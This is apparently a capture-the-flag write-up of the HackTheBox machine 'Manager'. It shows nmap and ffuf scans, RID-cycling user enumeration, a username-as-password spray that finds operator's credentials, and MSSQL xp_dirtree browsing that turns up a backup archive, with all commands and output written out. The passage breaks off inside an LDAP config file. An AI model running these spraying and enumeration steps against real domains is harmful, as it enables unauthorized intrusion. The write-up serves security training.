Manager starts with a RID cycle or Kerberos brute force to find users on the domain, and then a password spray using each user’s username as their password. When the operator account hits, I’ll get access to the MSSQL database instance, and use the xp_dirtree feature to explore the file system. I’ll find a backup archive of the webserver, including an old config file with creds for a user. As that user, I’ll get access to the ADCS instance and exploit the ESC7 misconfiguration to get access as administrator.
Name | Manager, play on HackTheBox
---|---
Release Date | 21 Oct 2023
Retire Date | 16 Mar 2024
OS | Windows
Base Points | Medium [30]
Rated Difficulty |
Radar Graph |
First Blood User | 00:21:37
First Blood Root | 00:43:47
Creator |
nmap finds a bunch of open TCP ports:
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.236
Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-12 19:24 EDT
Nmap scan report for 10.10.11.236
Host is up (0.10s latency).
Not shown: 65513 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49721/tcp open unknown
55791/tcp open unknown
56862/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 13.72 seconds
oxdf@hacky$ nmap -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV 10.10.11.236
Starting Nmap 7.80 ( https://nmap.org ) at 2024-03-12 19:32 EDT
Nmap scan report for 10.10.11.236
Host is up (0.098s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-13 06:32:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:57+00:00; +6h59m52s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:58+00:00; +6h59m51s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-13T04:21:14
|_Not valid after: 2054-03-13T04:21:14
|_ssl-date: 2024-03-13T06:35:57+00:00; +6h59m52s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:57+00:00; +6h59m52s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-13T06:35:58+00:00; +6h59m51s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/12%Time=65F0E637%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m51s, deviation: 0s, median: 6h59m50s
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server
| number: 15.00.2000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-13T06:35:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.96 seconds
There’s a lot here! The domain is manager.htb (based on LDAP and MSSQL). Before checking the webserver, I’ll brute force subdomains of manager.htb to see if any return something different with ffuf:
oxdf@hacky$ ffuf -u http://10.10.11.236 -H "Host: FUZZ.manager.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.236
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.manager.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 420 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
It doesn’t find anything. I’ll update my hosts file:
10.10.11.236 manager.htb dc01.manager.htb
The site is for a content writing service:
There is a contact form, but submitting it sends a GET request to /contact.html without any of the data from the form.
The pages on the site are all .html files, which indicates a static site.
The HTTP response headers show IIS and not much more:
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 27 Jul 2023 16:02:39 GMT
Accept-Ranges: bytes
ETag: "1c67a5c4a3c0d91:0"
Server: Microsoft-IIS/10.0
Date: Wed, 13 Mar 2024 07:03:59 GMT
Connection: close
Content-Length: 18203
The 404 page is the standard IIS 404:
It seems like a static site running on IIS. I’ll run feroxbuster against the site, using a lowercase wordlist since Windows IIS is case-insensitive:
oxdf@hacky$ feroxbuster -u http://10.10.11.236 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.236
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 146c http://10.10.11.236/js => http://10.10.11.236/js/
301 GET 2l 10w 150c http://10.10.11.236/images => http://10.10.11.236/images/
301 GET 2l 10w 147c http://10.10.11.236/css => http://10.10.11.236/css/
200 GET 507l 1356w 18203c http://10.10.11.236/
400 GET 6l 26w 324c http://10.10.11.236/error%1F_log
400 GET 6l 26w 324c http://10.10.11.236/css/error%1F_log
400 GET 6l 26w 324c http://10.10.11.236/images/error%1F_log
400 GET 6l 26w 324c http://10.10.11.236/js/error%1F_log
[####################] - 56s 106336/106336 0s found:8 errors:0
[####################] - 55s 26584/26584 476/s http://10.10.11.236/
[####################] - 55s 26584/26584 480/s http://10.10.11.236/js/
[####################] - 55s 26584/26584 480/s http://10.10.11.236/images/
[####################] - 55s 26584/26584 481/s http://10.10.11.236/css/
Nothing interesting.
netexec shows the same domain and hostname:
oxdf@hacky$ netexec smb 10.10.11.236
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
I can’t enumerate shares with no user, and a bad user does seem to get some auth, but then can’t list shares either:
oxdf@hacky$ netexec smb 10.10.11.236 --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] Error getting user: list index out of range
SMB 10.10.11.236 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
oxdf@hacky$ netexec smb 10.10.11.236 --shares -u 0xdf -p 0xdf
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\0xdf:0xdf
SMB 10.10.11.236 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
Given that some kind of null auth is allowed here, I can try a RID-cycling attack, brute-forcing Windows user security identifiers (SIDs) by incrementing the relative identifier (RID) part. The Impacket script lookupsid.py will do this nicely:
oxdf@hacky$ lookupsid.py 0xdf@manager.htb -no-pass
Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra
[*] Brute forcing SIDs at manager.htb
[*] StringBinding ncacn_np:manager.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: MANAGER\Administrator (SidTypeUser)
501: MANAGER\Guest (SidTypeUser)
502: MANAGER\krbtgt (SidTypeUser)
512: MANAGER\Domain Admins (SidTypeGroup)
513: MANAGER\Domain Users (SidTypeGroup)
514: MANAGER\Domain Guests (SidTypeGroup)
515: MANAGER\Domain Computers (SidTypeGroup)
516: MANAGER\Domain Controllers (SidTypeGroup)
517: MANAGER\Cert Publishers (SidTypeAlias)
518: MANAGER\Schema Admins (SidTypeGroup)
519: MANAGER\Enterprise Admins (SidTypeGroup)
520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
525: MANAGER\Protected Users (SidTypeGroup)
526: MANAGER\Key Admins (SidTypeGroup)
527: MANAGER\Enterprise Key Admins (SidTypeGroup)
553: MANAGER\RAS and IAS Servers (SidTypeAlias)
571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)
The number before the : in the output is the RID. I’ll use some Bash foo to get a nice users list:
oxdf@hacky$ lookupsid.py 0xdf@manager.htb -no-pass | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users
administrator
guest
krbtgt
dc01$
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
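Conceptually, RID cycling just takes the domain SID and appends candidate RIDs to it, asking the DC to resolve each resulting SID to a name. A minimal sketch of the SID construction in Python, using the domain SID reported above (the actual resolution step, which lookupsid.py does over LSARPC, is left out):

```python
# Domain SID as reported by lookupsid.py above
DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"

def candidate_sids(domain_sid, start, stop):
    """Yield (rid, sid) pairs; each SID would be handed to an
    LsarLookupSids-style resolver on the DC."""
    for rid in range(start, stop):
        yield rid, f"{domain_sid}-{rid}"

# Well-known RIDs: 500 is Administrator, 501 Guest, 502 krbtgt
sids = dict(candidate_sids(DOMAIN_SID, 500, 503))
print(sids[500])  # S-1-5-21-4078382237-1492182817-2568127209-500
```

Any SID that resolves to a name is a valid user or group, which is how the table above was built.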
I can also do this with netexec; I just need to use the guest account:
oxdf@hacky$ netexec smb 10.10.11.236 -u guest -p '' --rid-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\guest:
SMB 10.10.11.236 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.10.11.236 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.236 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.10.11.236 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.236 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)
I’ll use ldapsearch to confirm the base domain name:
oxdf@hacky$ ldapsearch -H ldap://dc01.manager.htb -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=manager,DC=htb
namingcontexts: CN=Configuration,DC=manager,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=manager,DC=htb
namingcontexts: DC=DomainDnsZones,DC=manager,DC=htb
namingcontexts: DC=ForestDnsZones,DC=manager,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
When I try to query further, it says I need auth, which I don’t have:
oxdf@hacky$ ldapsearch -H ldap://dc01.manager.htb -x -b "DC=manager,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=manager,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CF4, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
An alternative way to find usernames is by bruteforcing Kerberos with something like kerbrute:
oxdf@hacky$ kerbrute userenum /opt/SecLists/Usernames/cirt-default-usernames.txt --dc dc01.manager.htb -d manager.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/12/24 - Ronnie Flathers @ropnop
2024/03/12 20:43:18 > Using KDC(s):
2024/03/12 20:43:18 > dc01.manager.htb:88
2024/03/12 20:43:19 > [+] VALID USERNAME: ADMINISTRATOR@manager.htb
2024/03/12 20:43:19 > [+] VALID USERNAME: Administrator@manager.htb
2024/03/12 20:43:20 > [+] VALID USERNAME: GUEST@manager.htb
2024/03/12 20:43:20 > [+] VALID USERNAME: Guest@manager.htb
2024/03/12 20:43:21 > [+] VALID USERNAME: OPERATOR@manager.htb
2024/03/12 20:43:21 > [+] VALID USERNAME: Operator@manager.htb
2024/03/12 20:43:23 > [+] VALID USERNAME: administrator@manager.htb
2024/03/12 20:43:24 > [+] VALID USERNAME: guest@manager.htb
2024/03/12 20:43:25 > [+] VALID USERNAME: operator@manager.htb
2024/03/12 20:43:26 > Done! Tested 828 usernames (9 valid) in 7.886 seconds
It finds three: administrator, guest, and operator. I can use some other wordlists and find a handful more, but the important one is operator.
I can do a quick check to see if any of the usernames I’ve collected use their username as their password. With netexec, I’ll give the same list for -u and -p, plus the --no-brute flag, which means instead of trying each username with each password, it just tries the first username with the first password, the second with the second, and so on. I like the --continue-on-success flag to check if there is more than one set of valid creds here:
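The difference between the two modes is just pairing versus cross-product. A quick sketch (the usernames are a few from the list above; this only models the attempt generation, not the SMB authentication itself):

```python
from itertools import product

users = ["administrator", "guest", "operator"]
passwords = users  # same list passed to both -u and -p

# --no-brute: first user with first password, second with second, etc.
pairwise = list(zip(users, passwords))

# default behavior: every user tried with every password
cross = list(product(users, passwords))

print(len(pairwise), len(cross))  # 3 9
```

For a username-as-password spray, the pairwise mode is all that’s needed, and it keeps the attempt count (and lockout risk) down.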
oxdf@hacky$ netexec smb manager.htb -u users -p users --continue-on-success --no-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\dc01$:dc01$ STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\chinhae:chinhae STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
The operator account uses the password operator! It doesn’t work over WinRM, so no shell from here:
oxdf@hacky$ netexec winrm manager.htb -u operator -p operator
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [-] manager.htb\operator:operator
The shares on Manager are the standard DC shares:
oxdf@hacky$ netexec smb manager.htb -u operator -p operator --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\operator:operator
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL READ Logon server share
There’s nothing too interesting in these.
The operator account does have LDAP access:
oxdf@hacky$ netexec ldap manager.htb -u operator -p operator
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\operator:operator
Running ldapsearch -H ldap://dc01.manager.htb -x -D 'operator@manager.htb' -w operator -b "DC=manager,DC=htb" will dump a bunch of LDAP to the terminal. I’ll use ldapdomaindump to get all the info in a more viewable way:
oxdf@hacky$ mkdir ldap
oxdf@hacky$ ldapdomaindump -u manager.htb\\operator -p 'operator' 10.10.11.236 -o ldap/
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
oxdf@hacky$ ls ldap/
domain_computers_by_os.html domain_computers.html domain_groups.grep domain_groups.json domain_policy.html domain_trusts.grep domain_trusts.json domain_users.grep domain_users.json
domain_computers.grep domain_computers.json domain_groups.html domain_policy.grep domain_policy.json domain_trusts.html domain_users_by_group.html domain_users.html
The domain_users_by_group.html file is a nice overview of the users to target:
Raven is a good target to get a shell over WinRM. Nothing else seems interesting.
The creds work for the database as well:
oxdf@hacky$ netexec mssql manager.htb -u operator -p operator
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\operator:operator
mssqlclient.py will connect, using the -windows-auth flag to say that it’s using OS authentication, not creds within the DB:
oxdf@hacky$ mssqlclient.py -windows-auth manager.htb/operator:operator@manager.htb
Impacket v0.10.1.dev1+20230608.100331.efc6a1c3 - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
There are four DBs:
SQL (MANAGER\Operator guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
All four are default MSSQL databases. mssqlclient.py has extra shortcut commands to do common attacker things on the DB:
SQL (MANAGER\Operator guest@master)> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
enum_db - enum databases
enum_links - enum linked servers
enum_impersonate - check logins that can be impersonate
enum_logins - enum login users
enum_users - enum current db users
enum_owner - enum db owner
exec_as_user {user} - impersonate with execute as user
exec_as_login {login} - impersonate with execute as login
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
xp_dirtree {path} - executes xp_dirtree on the path
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
use_link {link} - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd} - executes a local shell cmd
show_query - show query
mask_query - mask query
enum_db will show the same thing I queried above:
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
xp_cmdshell is a feature in MSSQL to run commands on the system. operator doesn’t have access, and can’t enable it:
SQL (MANAGER\Operator guest@master)> xp_cmdshell whoami
[-] ERROR(DC01\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (MANAGER\Operator guest@master)> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
xp_dirtree is another feature for listing files on the filesystem. It works:
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
The only interesting directory in C:\Users is Raven, and it is inaccessible. In the web root, I’ll confirm that this is a static HTML site:
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
There’s also a backup zip!
I’ll grab the archive from the webserver:
oxdf@hacky$ wget http://manager.htb/website-backup-27-07-23-old.zip
--2024-03-13 08:58:58-- http://manager.htb/website-backup-27-07-23-old.zip
Resolving manager.htb (manager.htb)... 10.10.11.236
Connecting to manager.htb (manager.htb)|10.10.11.236|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-2 100%[==========================>] 1021K 1.50MB/s in 0.7s
2024-03-13 08:58:59 (1.50 MB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]
And extract it:
oxdf@hacky$ unzip website-backup-27-07-23-old.zip -d webbackup/
Archive: website-backup-27-07-23-old.zip
inflating: webbackup/.old-conf.xml
inflating: webbackup/about.html
inflating: webbackup/contact.html
inflating: webbackup/css/bootstrap.css
inflating: webbackup/css/responsive.css
inflating: webbackup/css/style.css
inflating: webbackup/css/style.css.map
inflating: webbackup/css/style.scss
inflating: webbackup/images/about-img.png
inflating: webbackup/images/body_bg.jpg
extracting: webbackup/images/call.png
extracting: webbackup/images/call-o.png
inflating: webbackup/images/client.jpg
inflating: webbackup/images/contact-img.jpg
extracting: webbackup/images/envelope.png
extracting: webbackup/images/envelope-o.png
inflating: webbackup/images/hero-bg.jpg
extracting: webbackup/images/location.png
extracting: webbackup/images/location-o.png
extracting: webbackup/images/logo.png
inflating: webbackup/images/menu.png
extracting: webbackup/images/next.png
extracting: webbackup/images/next-white.png
inflating: webbackup/images/offer-img.jpg
inflating: webbackup/images/prev.png
extracting: webbackup/images/prev-white.png
extracting: webbackup/images/quote.png
extracting: webbackup/images/s-1.png
extracting: webbackup/images/s-2.png
extracting: webbackup/images/s-3.png
extracting: webbackup/images/s-4.png
extracting: webbackup/images/search-icon.png
inflating: webbackup/index.html
inflating: webbackup/js/bootstrap.js
inflating: webbackup/js/jquery-3.4.1.min.js
inflating: webbackup/service.html
The first file, .old-conf.xml, is interesting. It has an LDAP configuration for the raven user, including a password:
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
